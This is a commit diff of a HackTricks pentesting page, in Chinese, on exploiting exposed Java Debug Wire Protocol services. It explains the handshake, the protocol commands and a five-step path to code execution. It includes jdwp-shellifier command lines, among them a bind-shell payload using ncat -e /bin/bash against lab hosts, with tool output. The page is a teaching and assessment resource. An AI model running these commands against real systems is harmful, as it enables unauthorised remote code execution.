Translated ['network-services-pentesting/pentesting-jdwp-java-debug-wire

This commit is contained in:
Translator 2023-12-29 15:27:09 +00:00
parent ff1578498c
commit 3d59d296cd

View file

@ -1,59 +1,59 @@
# JDWP渗透测试 - Java调试线协议
# Pentesting JDWP - Java Debug Wire Protocol
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中**宣传你的公司**吗?或者你想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
* 如果您在**网络安全公司**工作,想在**HackTricks**上看到您的**公司广告**,或者想要获取**PEASS最新版本或下载HackTricks的PDF**?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列。
* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
</details>
## Exploiting
你可以使用位于[https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier)的Python漏洞利用工具。
JDWP利用依赖于**协议缺乏认证和加密**。它通常出现在**端口8000**上,但也可能使用其他端口。通过向目标端口发送"JDWP-Handshake"来建立初始连接。如果JDWP服务处于活动状态它会以相同的字符串响应确认其存在。这种握手作为一种指纹识别方法用于识别网络上的JDWP服务。
在进程识别方面搜索Java进程中的字符串"jdwk"可以指示一个活动的JDWP会话。
首选工具是[jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier)。您可以使用不同的参数:
```bash
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
```
我发现使用`--break-on 'java.lang.String.indexOf'`可以使攻击更加**稳定**。如果你有机会上传一个后门到主机并执行它,而不是执行一个命令,那么攻击将更加稳定。
通常这个调试器在端口8000上运行如果你与该端口建立一个TCP连接并发送“**JDWP-Handshake**”服务器应该用相同的字符串回应你。此外你可以在网络中检查这个字符串以找到可能的JDWP服务。
如果在一个**java进程**中找到字符串“**jdwk**”,很可能它已经激活了**Java Debug Wired Protocol**,你可能能够进行横向移动,甚至**提升权限**如果以root身份执行
我发现使用 `--break-on 'java.lang.String.indexOf'` 可以使漏洞利用更加**稳定**。如果你有机会上传一个后门到主机并执行它,而不是执行命令,那么漏洞利用将会更加稳定。
## 更多细节
**摘自**[**https://ioactive.com/hacking-java-debug-wire-protocol-or-how/**](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)
**摘自** [**https://ioactive.com/hacking-java-debug-wire-protocol-or-how/**](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)
### **Java Debug Wire Protocol**
### **Java 调试线协议**
**Java Platform Debug Architecture (JPDA)**JDWP是全球Java调试系统Java Platform Debug Architecture (JPDA)\[2]的一个组成部分。下面是整体架构的图示
**Java 平台调试架构 (JPDA)**JDWP 是全局 Java 调试系统的一个组成部分,称为 Java 平台调试架构 (JPDA)\[2]。以下是整体架构的图表
[![](https://ioactive.com/wp-content/uploads/2014/04/jdpa.png)](https://ioactive.com/wp-content/uploads/2014/04/jdpa-1.png)
Debuggee由一个多线程的JVM组成运行我们的目标应用程序。为了能够进行远程调试JVM实例必须在命令行上显式地使用选项-Xdebug启动并使用选项-Xrunjdwp或-agentlib。例如启用远程调试的启动Tomcat服务器的命令如下
被调试对象由运行目标应用程序的多线程 JVM 组成。为了能够远程调试,必须在命令行上显式地使用 -Xdebug 选项启动 JVM 实例,以及 -Xrunjdwp或 -agentlib选项。例如启动一个启用了远程调试的 Tomcat 服务器,看起来像这样
[![](https://ioactive.com/wp-content/uploads/2014/04/tomat.png)](https://ioactive.com/wp-content/uploads/2014/04/tomat-1.png)
如架构图所示Java Debug Wire Protocol是调试器和JVM实例之间的中央链接。关于该协议的观察结果包括:
如架构图所示Java 调试线协议是调试器和 JVM 实例之间的中心链接。关于协议的观察包括:
* 它是一个基于数据包的网络二进制协议。
* 它大多是同步的。调试器发送一个命令到JDWP并期望接收到一个回复。然而一些命令如事件不需要同步响应。它们会在特定条件满足时发送一个回复。例如,断点是一个事件。
* 它不使用身份验证。
* 它主要是同步的。调试器通过 JDWP 发送命令并期望收到回复。然而,某些命令,如事件,不期望同步响应。它们会在特定条件满足时发送回复。例如,断点是一个事件。
* 它不使用证。
* 它不使用加密。
所有这些观察结果都是合理的,因为我们谈论的是一个调试协议。然而,当这样的服务暴露在敌对网络上,或者面向互联网时,事情可能会出错。
**握手**JDWP规定\[9]通信必须通过简单的握手来初始化。成功建立TCP连接后调试器客户端发送14个字符的ASCII字符串“JDWP-Handshake”。调试对象服务器通过发送完全相同的字符串来响应该消息。以下是scapy\[3]跟踪显示的初始双向握手:
所有这些观察都是有道理的,因为我们讨论的是一个调试协议。然而,当这样的服务暴露在敌对网络中,或面向互联网时,情况可能会出错。\
\
**握手**JDWP 规定\[9]通信必须通过一个简单的握手来启动。在成功的 TCP 连接后,调试器(客户端)发送 14 个字符的 ASCII 字符串 “JDWP-Handshake”。被调试对象服务器通过发送完全相同的字符串来响应此消息。以下 scapy\[3] 跟踪显示了最初的双向握手:
root:\~/tools/scapy-hg # ip addr show dev eth0 | grep “inet “ inet 192.168.2.2/24 brd 192.168.2.255 scope global eth0root:\~/tools/scapy-hg # ./run\_scapy
Welcome to Scapy (2.2.0-dev)\
欢迎使用 Scapy (2.2.0-dev)\
**>>>** sniff(filter=”tcp port 8000 and host 192.168.2.9″, count=8)\
\<Sniffed: TCP:9 UDP:1 ICMP:0 Other:0>\
**>>>** tcp.hexraw()\
@ -68,52 +68,55 @@ Welcome to Scapy (2.2.0-dev)\
**0000 4A 44 57 50 2D 48 61 6E 64 73 68 61 6B 65 JDWP-Handshake**\
0007 15:49:30.407636 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 A
有经验的安全审计员可能已经意识到,这样一个简单的握手提供了一种在互联网上轻松发现活动的JDWP服务的方法。只需发送一个简单的探测包并检查特定的响应。更有趣的是在使用ShodanHQ\[4]扫描时观察到了IBM Java Development Kit的行为服务器首先与上述相同的横幅进行“对话”。因此完全 passively 发现活动的JDWP服务是可能的本文稍后将介绍如何使用著名的Shodan进行
**通信**JDWP定义了调试器和调试对象之间通信所涉及的消息\[10]。这些消息遵循一个简单的结构,定义如下:&#x20;
一个有经验的安全审计员可能已经意识到,这样一个简单的握手提供了一种轻松发现互联网上活跃 JDWP 服务的方法。只需发送一个简单的探针并检查特定的响应。更有趣的是,在使用 ShodanHQ\[4] 扫描时观察到 IBM Java 开发工具包的行为,服务器首先使用前面提到的相同横幅“说话”。因此,有一种完全被动的方式来发现活跃的 JDWP 服务(本文后面将利用著名的 Shodan 来介绍这一点)。\
\
**通信**JDWP 定义了调试器和调试对象之间通信所涉及的消息\[10]。消息遵循一个简单的结构,定义如下:&#x20;
<figure><img src="https://ioactive.com/wp-content/uploads/2014/04/createstring.png" alt=""><figcaption></figcaption></figure>
长度和ID字段相当明显。标志字段仅用于区分请求数据包和回复数据包值为0x80表示回复数据包。CommandSet字段定义了命令的类别,如下表所示。\
Length 和 Id 字段相当自解释。Flag 字段仅用于区分请求包和回复包0x80 的值表示回复包。CommandSet 字段定义了命令的类别,如下表所示。\
\\
| **CommandSet** | \*\* Command\*\* |
| -------------- | ---------------------------------------------------------------------------------------------------------------- |
| 0x40 | JVM要执行的操作(例如设置断点) |
| 0x400x7F | 向调试器提供事件信息例如JVM已经触发断点正在等待进一步操作) |
| 0x40 | JVM 应采取的行动(例如,设置断点) |
| 0x400x7F | 向调试器提供事件信息(例如JVM 已经触发断点并等待进一步操作) |
| 0x80 | 第三方扩展 |
考虑到我们想要执行任意代码,以下命令对我们的目的最有趣。
考虑到我们想要执行任意代码,以下命令对我们的目的来说最有趣。
* VirtualMachine/IDSizes定义了JVM处理的数据结构的大小。这是nmap脚本jdwp-exec.nse\[11]无法工作的原因之一,因为该脚本使用了硬编码的大小。
* ClassType/InvokeMethod允许您调用一个静态函数。
* ObjectReference/InvokeMethod允许您调用JVM中实例化对象的函数。
* StackFrame/(Get|Set)Values提供了从线程堆栈中推送/弹出的功能。
* Event/Composite强制JVM对此命令声明的特定行为做出反应。该命令是调试目的的一个重要关键因为它允许设置断点在运行时通过线程进行单步调试并在访问/修改值时以与GDB或WinDBG完全相同的方式收到通知。
不仅可以使用JDWP访问和调用已经驻留在内存中的对象还可以创建或覆盖数据。
* VirtualMachine/IDSizes 定义 JVM 处理的数据结构的大小。这是 nmap 脚本 jdwp-exec.nse\[11] 不工作的原因之一,因为脚本使用了硬编码的大小。
* ClassType/InvokeMethod 允许你调用一个静态函数。
* ObjectReference/InvokeMethod 允许你调用 JVM 中实例化对象的函数。
* StackFrame/(Get|Set)Values 提供线程栈的推/弹功能。
* Event/Composite 强制 JVM 对此命令声明的特定行为做出反应。这个命令是调试目的的主要关键,因为它允许在运行时设置断点、单步执行线程,并在访问/修改值时以与 GDB 或 WinDBG 完全相同的方式得到通知。
* VirtualMachine/CreateString允许将字符串转换为在JVM运行时中存在的java.lang.String。
* VirtualMachine/RedefineClasses允许安装新的类定义。
JDWP 不仅允许你访问和调用已经存在于内存中的对象,它还允许你创建或覆盖数据。
**“我们拥有你的JDWP”**
* VirtualMachine/CreateString 允许你将一个字符串转换成存在于 JVM 运行时的 java.lang.String。
* VirtualMachine/RedefineClasses 允许你安装新的类定义。
**“所有的 JDWP 都属于我们”**
正如我们所见JDWP 提供了内置命令,将任意类加载到 JVM 内存中并调用已经存在和/或新加载的字节码。以下部分将介绍用 Python 创建利用代码的步骤,该代码的行为类似于 JDI 前端的部分实现,以便尽可能可靠。独立的漏洞利用脚本的主要原因是,作为一名渗透测试人员,我喜欢“一击必杀”的漏洞利用。也就是说,当我确信一个环境/应用程序/协议是脆弱的时,我希望立即准备好我的工具来利用它(即不是仅仅存在的概念验证)。所以现在我们已经介绍了理论,让我们进入实际实现。面对一个开放的 JDWP 服务任意命令执行只需五个步骤或者使用这个漏洞只需一个命令行。以下是操作步骤1. 获取 Java 运行时引用JVM 通过它们的引用来操作对象。因此,我们的漏洞利用必须首先获取 java.lang.Runtime 类的引用。从这个类中,我们需要 getRuntime() 方法的引用。这是通过获取所有类AllClasses 包和我们正在寻找的类中的所有方法ReferenceType/Methods 包来完成的。2. 设置断点并等待通知异步调用这是我们漏洞利用的关键。为了调用任意代码我们需要在运行中的线程上下文中。为此一个技巧是在运行时已知会被调用的方法上设置一个断点。如前所述JDI 中的断点是一个异步事件,其类型设置为 BREAKPOINT(0x02)。当触发时JVM 向我们的调试器发送一个 EventData 包,包含我们的断点 ID更重要的是包含触发它的线程的引用。\
\
正如我们所见JDWP提供了内置命令可以将任意类加载到JVM内存中并调用已经存在和/或新加载的字节码。下面的部分将介绍在Python中创建利用代码的步骤该代码作为JDI前端的部分实现以尽可能可靠。独立的利用脚本的主要原因是作为渗透测试人员我喜欢“一击必杀”的利用。也就是说当我确定一个环境/应用程序/协议存在漏洞时我希望立即准备好利用它的工具即没有PoC这基本上是迄今为止唯一存在的东西。所以现在我们已经了解了理论知识让我们进入实际实现。当面对一个开放的JDWP服务时任意命令执行只有五个步骤之遥或者使用这个利用只需要一条命令行。下面是具体步骤1. 获取Java Runtime引用JVM通过引用来操作对象。因此我们的利用必须首先获取对java.lang.Runtime类的引用。从这个类中我们需要对getRuntime()方法的引用。这是通过获取所有类AllClasses数据包和我们正在查找的类中的所有方法ReferenceType/Methods数据包来完成的。2. 设置断点并等待通知异步调用这是我们利用的关键。为了调用任意代码我们需要处于运行线程上下文中。为此一个技巧是在已知在运行时调用的方法上设置断点。如前所述JDI中的断点是一个异步事件其类型设置为BREAKPOINT(0x02)。当命中时JVM会向我们的调试器发送一个EventData数据包其中包含我们的断点ID更重要的是命中它的线程的引用。
<figure><img src="https://ioactive.com/wp-content/uploads/2014/04/event_break.png" alt=""><figcaption></figcaption></figure>
因此将其设置在经常调用的方法上是个好主意比如java.net.ServerSocket.accept()每次服务器接收到新的网络连接时都很可能调用该方法。然而必须记住它可以是运行时存在的任何方法。3. 在Runtime中分配Java String对象以执行有效载荷我们将在JVM运行时中执行代码因此我们操作的所有数据如字符串必须存在于JVM运行时中即具有运行时引用。通过发送CreateString命令很容易实现这一点。
因此,将它设置在一个经常被调用的方法上是一个好主意,例如 java.net.ServerSocket.accept(),每次服务器接收到新的网络连接时都很可能调用。然而,必须记住它可以是运行时存在的任何方法。3. 在运行时分配一个 Java String 对象来执行有效载荷我们将在 JVM 运行时执行代码,因此我们操作的所有数据(例如字符串)必须存在于 JVM 运行时(即拥有一个运行时引用)。这通过发送一个 CreateString 命令来轻松完成
<figure><img src="https://ioactive.com/wp-content/uploads/2014/04/Untitled.png" alt=""><figcaption></figcaption></figure>
4. 从断点上下文获取Runtime对象此时我们几乎拥有了成功、可靠利用所需的所有元素。我们缺少的是一个Runtime对象引用。获取它很容易我们可以通过在JVM运行时中执行java.lang.Runtime.getRuntime()静态方法\[8]发送ClassType/InvokeMethod数据包并提供Runtime类和线程引用来实现。5. 在Runtime实例中查找并调用exec()方法最后一步就是在前一步获得的Runtime静态对象中查找exec()方法并调用它通过发送ObjectReference/InvokeMethod数据包使用我们在第三步创建的String对象。
4\. 从断点上下文获取 Runtime 对象此时我们几乎拥有了成功、可靠利用所需的所有元素。我们缺少的是一个 Runtime 对象引用。获取它很容易,我们可以简单地在 JVM 运行时执行 java.lang.Runtime.getRuntime() 静态方法\[8],通过发送一个 ClassType/InvokeMethod 包并提供 Runtime 类和线程引用。5. 查找并调用 Runtime 实例中的 exec() 方法最后一步很简单,就是在前一步获得的 Runtime 静态对象中查找 exec() 方法并调用它(通过发送一个 ObjectReference/InvokeMethod 包)与我们在第三步创建的 String 对象。&#x20;
<figure><img src="https://ioactive.com/wp-content/uploads/2014/04/exec.png" alt=""><figcaption></figcaption></figure>
Et voilà!! 快速而简单。作为演示让我们启动一个启用了JPDA“调试模式”的Tomcat
Et voilà !! 快速且简单。作为演示,让我们启动一个启用了 JPDA “调试模式”的 Tomcat
root@pwnbox:\~/apache-tomcat-6.0.39# ./bin/catalina.sh jpda start
我们执行脚本而不带任何要执行的命令,只是为了获取一般的系统信息:
我们执行我们的脚本,不带命令来执行,只是为了简单地获取一般的系统信息:
```
hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.9
[+] Targeting 192.168.2.9:8000
@ -128,7 +131,7 @@ hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.9
[+] Found User home directory /Users/pentestosx
[!] Command successfully executed
```
相同的命令行但针对Windows系统并在完全不同的方法上中断
相同的命令行但针对Windows系统并在一个完全不同的方法上中断:
```
hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 break-on java.lang.String.indexOf
[+] Targeting 192.168.2.8:8000
@ -144,7 +147,7 @@ hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 break-on java.lan
[+] Found User home directory C:Usershugsy
[!] Command successfully executed
```
我们执行我们的利用程序在Linux系统上生成一个绑定shell使用有效载荷“ncat -e /bin/bash -l -p 1337”
我们执行我们的exploit来生成一个bind shellpayload为“ncat -e /bin/bash -l -p 1337”针对Linux系统
```
hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 cmd ncat -l -p 1337 -e /bin/bash
[+] Targeting 192.168.2.8:8000
@ -162,41 +165,41 @@ root@pwnbox:~/apache-tomcat-6.0.39# netstat -ntpl | grep 1337
tcp 0 0 0.0.0.0:1337 0.0.0.0:* LISTEN 19242/ncat
tcp6 0 0 :::1337 :::* LISTEN 19242/ncat
```
最终的攻击利用了这些技术,并添加了一些检查,并发送挂起/恢复信号,以尽可能少地造成干扰(最好不要破坏你正在工作的应用程序,对吧?)。它有两种模式:
最终的利用技术使用了这些技术,增加了一些检查,并发送挂起/恢复信号以尽可能减少干扰(不破坏您正在工作的应用程序总是最好的,对吧?)。它有两种模式:
* “默认”模式完全不会干扰只是执行Java代码以获取本地系统信息非常适合向客户提供PoC)。
* 通过传递“cmd”选项在远程主机上执行系统命令,因此更具侵入性。命令是使用JVM正在运行的特权执行的。
* “默认”模式完全不侵入性只是执行Java代码以获取本地系统信息非常适合向客户展示概念验证)。
* 传递“cmd”选项在远程主机上执行系统命令因此更具侵入性。命令是以JVM运行的权限完成的。
这个攻击脚本已成功测试过
此利用脚本已成功测试对抗
* Oracle Java JDK 1.6和1.7
* Oracle Java JDK 1.6 1.7
* OpenJDK 1.6
* IBM JDK 1.6
由于Java在设计上是跨平台的,可以在Java支持的任何操作系统上执行命令。对我们渗透测试人员来说,这实际上是个好消息:**开放的JDWP服务意味着可靠的远程代码执行**。到目前为止,一切顺利。
由于Java本质上是平台无关的,因此可以在Java支持的任何操作系统上执行命令。这实际上对我们渗透测试人员来说是个好消息:**开放的JDWP服务意味着可靠的RCE**。到目前为止,一切顺利。
### **现实生活中的利用情况如何?**
事实上JDWP在Java应用程序世界中被广泛使用。然而在进行远程评估时渗透测试人员可能不经常遇到它因为防火墙通常会阻止它运行的端口。但这并不意味着JDWP在野外找不到
事实上JDWP在Java应用程序世界中使用相当广泛。然而渗透测试人员在进行远程评估时可能不会经常看到它因为防火墙会也应该大多数情况下阻止运行它的端口。但这并不意味着在野外找不到JDWP
* 在撰写本文时,快速在ShodanHQ\[4]上搜索立即显示大约有40个服务器发送JDWP握手
* 在撰写本文时,快速搜索ShodanHQ\[4]立即显示了大约40台服务器发送JDWP握手
![](https://ioactive.com/wp-content/uploads/2014/04/shodan.png)
这实际上是一个有趣的发现,因为正如我们之前所见,应该是客户端(调试器)发起对话。
这实际上是一个有趣的发现,因为正如我们之前看到的,应该是客户端(调试器)开始对话。
* GitHub\[7]也显示了大量潜在易受攻击的开源应用程序:
* GitHub\[7] 也显示了大量可能存在漏洞的开源应用程序:
![](https://ioactive.com/wp-content/uploads/2014/04/github.png)
* 对互联网进行特定端口tcp/8000、tcp/8080、tcp/8787、tcp/5005的masscan扫描发现许多主机无法在此报告响应了初始握手。
* 在野外发现了一些“企业”应用程序默认运行JDWP服务查找实际端口号留给好奇的读者作为练习)。
* 使用masscan在互联网上寻找特定端口tcp/8000, tcp/8080, tcp/8787, tcp/5005发现了许多主机在此无法报告响应初始握手。
* 在野外发现了运行JDWP服务的“企业”应用程序\*默认\*(找到实际的端口号留给好奇的读者作为练习)。
只是发现互联网上开放的JDWP服务的几种方法。这是一个很好的提醒,应用程序应定期进行彻底的安全审查,生产环境应关闭任何调试功能,并配置防火墙仅限制对正常操作所需的服务的访问。允许任何人连接到JDWP服务与允许连接到gdbserver服务完全相同可能更稳定。希望您喜欢阅读本文就像我喜欢玩JDWP一样。祝所有强大的海盗们快乐的JDWP控制
些只是在互联网上发现开放JDWP服务的几种方式。这是一个很好的提醒,应用程序应定期进行彻底的安全审查,生产环境应关闭任何调试功能,防火墙应配置为仅限制访问正常操作所需的服务。允许任何人连接到JDWP服务就像允许连接到gdbserver服务一样可能是更稳定的方式。我希望你喜欢阅读这篇文章就像我喜欢玩JDWP一样。祝你们所有强大的海盗快乐的JDWP征服
**感谢**\
\
要感谢Ilja Van Sprundel和Sebastien Macke的想法和测试。
想感谢Ilja Van Sprundel和Sebastien Macke为他们的想法和测试。
### **参考资料:**
@ -216,10 +219,10 @@ tcp6 0 0 :::1337 :::* LISTEN 192
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中**为你的公司做广告**吗?或者你想要**获取最新版本的PEASS或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧**
* 如果你在**网络安全公司**工作,想在**HackTricks**中看到你的**公司广告**,或者想要访问**最新版本的PEASS或下载HackTricks的PDF**查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**hacktricks repo**](https://github.com/carlospolop/hacktricks) 和 [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)提交PR来**分享你的黑客技巧**
</details>